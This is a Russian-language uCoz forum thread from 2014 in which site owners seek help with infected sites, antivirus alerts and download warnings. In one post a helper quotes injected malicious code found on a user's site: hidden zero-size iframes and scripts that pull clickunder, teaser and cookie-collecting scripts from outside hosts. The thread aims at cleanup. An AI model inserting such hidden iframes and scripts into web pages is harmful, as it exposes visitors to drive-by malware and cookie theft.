Чат сообщества
   | |
| Модератор форума: Yuri_G |
| Сообщество uCoz Мастерская uCoz Безопасность сайта Вирусы на сайтах (предотвращение, диагностика) |
| Вирусы на сайтах |
|
Как предотвратить попадание вредоносных ссылок на сайт
Диагностика
Правила подачи заявки на диагностику и поиск вредоносного кода на сайте
Полезные ссылки: Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:
|
|
Цитата webanet (  )SOCHI1014, на вашем скриншоте идет перенаправление (или то, что доктор назвал перенаправлением с самого на себя. адреса входа и выхода идентичны Цитата Связался с Dw отправил им запрос буду ждать теперь ответа спасибо за понимание Пожалуйста посмотрите внимательней http://ads.betweendigital.com/adj?ref....s=95262 перенаправляет наhttp://ads.betweendigital.com/ul_cb/adj?ref=&tz=-360&fl=12&pos=atf&w=468&h=60&s=95262 |
|
SOCHI1014,
Цитата Пожалуйста посмотрите внимательней |
|
Цитата webanet ( )SOCHI1014, Цитата Пожалуйста посмотрите внимательней смотрела внимательно. поэтому и удалила часть своего сообщения, чтобы не получить от вас то, что получила, и чтобы не разъяснять дальше. ждите пожалуйста. все будет нормально Спасибо. |
|
Модератор форума, Сайт galabog.ucoz.ru в разделе скачать на компьютер на странице есть красная кнопка скачать. я загрузил в файловый менеджер файл без вируса! и прикрепил к кнопке скачать. нажимаю скачать (красная кнопка) и выходит окно что данный файл может содержать вирусы!!!! Как такое возможно если я загрузить файл (приложение формата exe и он без вируса! помогите убрать окно которое вылетает
|
|
dadf, на все файлы формата exe, загруженные на сервера сайта, ставится автоматическая страница о том, что файл может содержать вирусы. Эта страница сделана для того, чтобы люди немного подумали перед тем, как скачивать файл. Как вариант могу предложить вам заархивировать файл архиватором (например 7-Zip) и залить на сайт. Тогда этой страницы не будет.
|
|
Вирусня прёт. Судя по всему, из-за рекламы.
Цитата из Dr. Web: " "Object","Threat","Action","Path","" "adj?ref=&tz=-240&fl=11&pos=atf&w=468&h=60&s=95262","SCRIPT.Virus","Заблокирован","http://ads.betweendigital.com/adj?ref=&tz=-240&fl=11&pos=atf&w=468&h=60&s=95262" " Адрес сайта: http://east-basketball.ru/ |
|
FaithNoMore, тот же DR.Web ⇒ //u.to/O-a4Bg
Вы как клиент DR.Web можете обратится в их поддержку за разъяснением Бесплатный номер техподдержки в России: 8-800-333-7932 Для звонок в не из РФ +7 (495) 789-45-86 (техподдержка) |
|
FaithNoMore, когда вы обновляли свой антивирус в последний раз?
|
|
Пришло письмо с Dr web
Сообщение отредактировал SOCHI1014 - Вторник, 25 Мар 2014, 19:25:54
|
|
Здравствуйте!
На мой сайт яндекс наложил ограничение, пишет: Сайт может угрожать безопасности вашего компьютера или мобильного устройства Указывает на главную страницу, надо полагать что весь сайт. Я в шоке Сайт: http://peta4ok.3dn.ru Что делать? |
|
Pietari8575, вот образец вредоносного кода
Код <iframe src="http://pluginplus.net/plugins/statistic/statistic_im2.html" style="width: 0px; height: 0px; border: 0px none;"></iframe><iframe src="http://pluginplus.net/plugins/statistic/statistic_all.html" style="width: 0px; height: 0px; border: 0px none;"></iframe><iframe src="http://pluginplus.net/plugins/statistic/statistic_im2.html" style="width: 0px; height: 0px; border: 0px none;"></iframe><iframe src="http://pluginplus.net/plugins/statistic/statistic_all.html" style="width: 0px; height: 0px; border: 0px none;"></iframe><iframe src="http://kinodrug.net/iblock/redsteam.html" style="width: 0px; height: 0px; border: 0px none;"></iframe><iframe src="http://kinodrug.net/iblock/ruiblock.html" style="width: 0px; height: 0px; border: 0px none;"></iframe><iframe src="http://kinodrug.net/iblock/redsteam.html" style="width: 0px; height: 0px; border: 0px none;"></iframe><iframe src="http://kinodrug.net/iblock/ruiblock.html" style="width: 0px; height: 0px; border: 0px none;"></iframe></span></div><script src="https://pluginplus.net/plugins/system/system_im2.js"></script><script src="https://pluginplus.net/plugins/system/system_im2.js"></script><script src="http://pluginplus.net/plugins/reklama/iframe.js" type="text/javascript"></script><script src="http://pluginplus.net/plugins/reklama/clickunder_adv.js" type="text/javascript"></script><script src="http://pluginplus.net/plugins/reklama/teasers.js" type="text/javascript"></script><script src="http://pluginplus.net/plugins/ssa.js" type="text/javascript"></script><script src="http://pluginplus.net/plugins/reklama/iframe.js" type="text/javascript"></script><script src="http://pluginplus.net/plugins/reklama/clickunder_adv.js" type="text/javascript"></script><script src="http://pluginplus.net/plugins/reklama/teasers.js" type="text/javascript"></script><script src="http://pluginplus.net/plugins/ssa.js" type="text/javascript"></script><script src="http://pluginplus.net/cookies_ext/get.php?callback=getValue"></script><script src="http://pluginplus.net/ssa/get.php?site=peta4ok.3dn.ru&callback=getValue2"></script><script src="http://pluginplus.net/cookies_ext/get.php?callback=getValue"></script><script src="http://pluginplus.net/ssa/get.php?site=peta4ok.3dn.ru&callback=getValue2"></script> </div> пример зараженного материала http://peta4ok.3dn.ru/news/poweriso_5_9_repack_by_cuta/2014-03-22-1838 вы этот материал скопировали откуда то? также стоит удалить ифрейм Код <iframe style="position:absolute;left:1%;width:0%;top:1%;height:0%;" src="http://www.for.ucoz.net"> </iframe> |
|
Цитата webanet ( )также стоит удалить ифрейм<iframe style="position:absolute;left:1%;width:0%;top:1%;height:0%;" src="http://www.for.ucoz.net"> </iframe> он в шаблоне 1. Где конкретно в шаблоне, найти этот ифрейм? Эту новость размещал "журналист". По Вашей указанной ссылке сумел уже удалить этот код. 2. Скажите, значит ли это, что, точно также заряжены другие страницы? Если да, то, есть ли способ найти их за раз и удалить, к чертовой бабушке :-) 3. Еще, со вчерашнего дня начал замечать, при входе на сайт, вот такое сообщение моим Антивирусом: Заблокирована инфекция URL:http://kinodrug.net/iblock/redsteam.html Заражение:JS:ScriptIP-inf [Trj]Он его блокирует, но при следующем входе опять тоже самое. Заранее благодарю. С уважением |
|
Pietari8575,
Цитата 3. Еще, со вчерашнего дня начал замечать, при входе на сайт, вот такое сообщение моим Антивирусом: Заблокирована инфекция URL:http://kinodrug.net/iblock/redsteam.html Заражение:JS:ScriptIP-inf Цитата 1. Где конкретно в шаблоне, найти этот ифрейм? Цитата 2. Скажите, значит ли это, что, точно также заряжены другие страницы? Если да, то, есть ли способ найти их за раз и удалить, к чертовой бабушке :-) не знаю. я просмотрела первые две страницы |
|
Pietari8575, вы не дочистили материал. в полном описании удалили все. а в кратком как было так и осталось все
|
|
Цитата webanet ( )iframe Вот оно что, даже не подумал об этом. Удалил. Спасибо. Добавлено (27 Мар 2014, 01:21:57) --------------------------------------------- Цитата webanet ( )панель управления - дизайн - управление дизайном - страницы сайта - поиском браузера ищем www.for.ucoz.net Все проверил. Ничего такого не смог найти. Спасибо. Добавлено (27 Мар 2014, 01:25:26) --------------------------------------------- Цитата webanet ( )не знаю. я просмотрела первые две страницы Сообщение отредактировал Pietari8575 - Четверг, 27 Мар 2014, 01:25:56
|
| |||